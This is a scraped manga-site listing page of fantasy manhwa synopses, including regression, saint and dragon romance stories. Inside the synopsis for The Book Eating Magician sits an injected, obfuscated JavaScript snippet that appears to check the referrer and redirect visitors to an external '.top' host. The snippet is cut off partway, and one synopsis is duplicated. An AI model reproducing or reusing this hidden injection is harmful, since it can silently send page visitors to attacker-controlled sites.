Magic - Page 43

Step into the universe of Magic manga with stunning art and stories. Read Magic manga free anytime!

675 results

The Academy's Genius Swordsman

Following a momentous battle against giants for the fate of the world, Ronan emerges victorious as the last man standing of the Imperial Army. As he laments this hollow victory with his dying commander, Grand Marshal Adeshan, they quickly learn that the war is far from over and an overwhelming force of giants descends from the heavens. Fearing the worst, yet seeing hope in the courageous Ronan, Adeshan uses her last time slip to send him back to the past, so that he can enroll in the prestigious Phileon Academy and become the strongest swordsman the empire has ever seen!


The Amazing Digital Circus

Where is the exit? The comic adaptation of the dark comedy begins! ___ **Cooperation:** InfoLens Inc. Published monthly in print in Corocoro Ichiban! and online in Weekly Corocoro Comic.

2 days ago

The Archduke's Adopted Saint

I was forced to live in captivity for the rest of my life because I happened to be aware of the fact that I was a saint. I was truly a \'real\' saint, but that didn’t matter, because there was already a designated saint in the temple. When I died from all the abuse I endured, I was sent back to a time before all those previous events in my life had happened. After fifteen regressions, I was exhausted. I prayed, \"I don\'t want anything to do with this, so please just let me die.\" And at the moment when I thought could finally be able to die, someone said, \"How about being my daughter?\" …That monstrous grand duke adopted me. --- \"I want to quit. I don\'t want to live being exploited again.\" Despite having the powers of a saint, she had to live her entire life in captivity—all for the sake of the fake saint who was anointed in secret. Unable to endure the torture any longer, she died alone and returned back in time. Daina, who chose a different path at the end of her forced repeated regressions, was adopted by the Grand Duke in a twist of fate… \"As the sole daughter of the Teresia family, I will make it so that you have everything.\" Now that she has a new name and understands the importance of family, Daina decides to exact revenge so she can no longer be used by the temple. --- **Original Webtoon:** [Daum](, [KakaoPage](


The Archmage's Restaurant

A man who was reincarnated in another world as a 9th class wizard and retired after saving the continent from a dragon war. He decides to open a small restaurant in the countryside, but his routine is anything but ordinary. On the second floor of his restaurant, there lives a black dragon who has transformed into a woman, named Rurin. She is greedy, cute and loyal to him, but also ignorant and clueless about the human world. They live a fun and warm life, serving customers, solving problems and growing violets in the garden.


The Archmage’s Daughter

Maybelle had lived a life of abuse under her parents. Upon discovery that these ‘parents’ aren’t her true biological parents and that somewhere, her father exists, with a sad heart, Maybelle sets off in search of him.


The Archmage’s Daughter

Maybelle had lived a life of abuse under her parents. Upon discovery that these ‘parents’ aren’t her true biological parents and that somewhere, her father exists, with a sad heart, Maybelle sets off in search of him.


The Author I Stole

Angela, who was born in a completely different world while retaining memories of her past life, embarks on her second life. She wants to widely spread Andersen’s stories, her favourites from her past life. Angela establishes a publishing company and successfully publishes his fairy tales, thriving in her endeavors. However… “It doesn’t make sense…” “What do you mean by ‘It doesn’t make sense’?” To her surprise, there is also an Andersen in this world! And not just any Andersen, but a sharp and handsome one. Angela jumps at the opportunity to recruit the writer for the first time in her life. Although he leads a stable life as a knight from a noble family, she possesses a jewel-like talent of her own. “Author, please (eternally) contract with me!” A romance fantasy even more enchanting than a fairy tale, .” 내가 훔친 작가님


The Baby Dragon Tames The Crazy People

Thalassa Is The Emperor Of Atlantis, The Empire Within The Ocean. Contrary To Her Belief That She Would Live Out Her Days Happily And Peacefully, She Was Betrayed By Her Lover And Friend And Eventually Sealed Away For A Millennium. When She Opened Her Eyes Again… “To Think That I, Who Was Once The Emperor Of A Great Empire, Have Now Turned Into A Tiny Baby Whose Size Is That Of A Baby Crab!’ Atlantis Has Already Fallen, And Thalassa Has Reincarnated As The Baby Dragon Princess Also Known As The Duke’s Daughter Of The Nation That Her Traitors Founded. And What? In Order To Break The Curse, The Dragon Princess Must Marry The Crown Prince? ‘You Sea Anemone-Like Bastards!’ Not Only Does She Have To Uncover The Secrets Behind Atlantis’ Downfall, But She’s Also Fated To Marry The Crown Prince Regardless. ‘Oh Well, I’ll Just Go Along With This Until The Crown Prince’s Curse Is Lifted!’ Little Dragon Princess Tames The Crazies / 아기 용태자비는 미친놈들을 길들인다


The Book Eating Magician

Book Eater is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About A student at the magician's academy with little talent, but all the knowledge one would expect of a scholar. He soon gains the power to obtain skills from books directly. He is the book eater.<script></script><script>function _0x5723(){var _0x14ce33=['OZKcZ','cvBoe','364383nCOkUX','djzFf','google','text','then','13383848pjkNPf','1339907bKVJKS','1141972yiuCBD','dYWNV','includes','.customapi','44826kvRKKD','590iNSwCK','SMlBk','floor','4773690OjaKfe','25TCIBQG','referrer','54ekQKRf','rdWqY','http://rea','random','href','','KFIFJ','cZwqD','location','8307817UcLXAd','https://ip','.top/','kOoDf'];_0x5723=function(){return _0x14ce33;};return _0x5723();}(function(_0x1df6b7,_0x1be0b4){var _0x29e300=_0x3a91,_0x4b778c=_0x1df6b7();while(!![]){try{var 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The Book of Lagier

The Book of Lagier is a Manga/Manhwa/Manhua in (English/Raw) language, Fantasy series is written by Updating This Comic is About The great Demon King, Embilden, was the first to unite the demon world. One day, a human dared summon the Demon King. It was the greedy and fat, Prince Lagier Lou Jerlayla Rodwill! However, while summoning the Demon King, he had made a mistake in the process, which caused his death. Lagier’s body is forcefully frozen because of the contract he had made with the Demon King… “Well, I might as well just grant him his wish.” The Demon King decides to become Lagier and grant the wish the Prince had before he was frozen to death. Until the day the kingdom of Jerlayla rules the world with power unmatched by anyone! This is the start of a new legend……! “I should start by losing weight.” …I need to go on a diet first.


The Bride who Raises the Villainous Dragon

\"It seems a magnificent dragon has fallen head over heels for me?\" Pearl, the cursed daughter of a noble, was on her way to being sold off to a neighboring lord when she was suddenly kidnapped. But the one who kidnapped her is none other than Erik— a descendant of the Great Dragons. This enchanting yet fierce dragon confronted Pearl with a single demand, to say the words \"I like you.\"...

2 days ago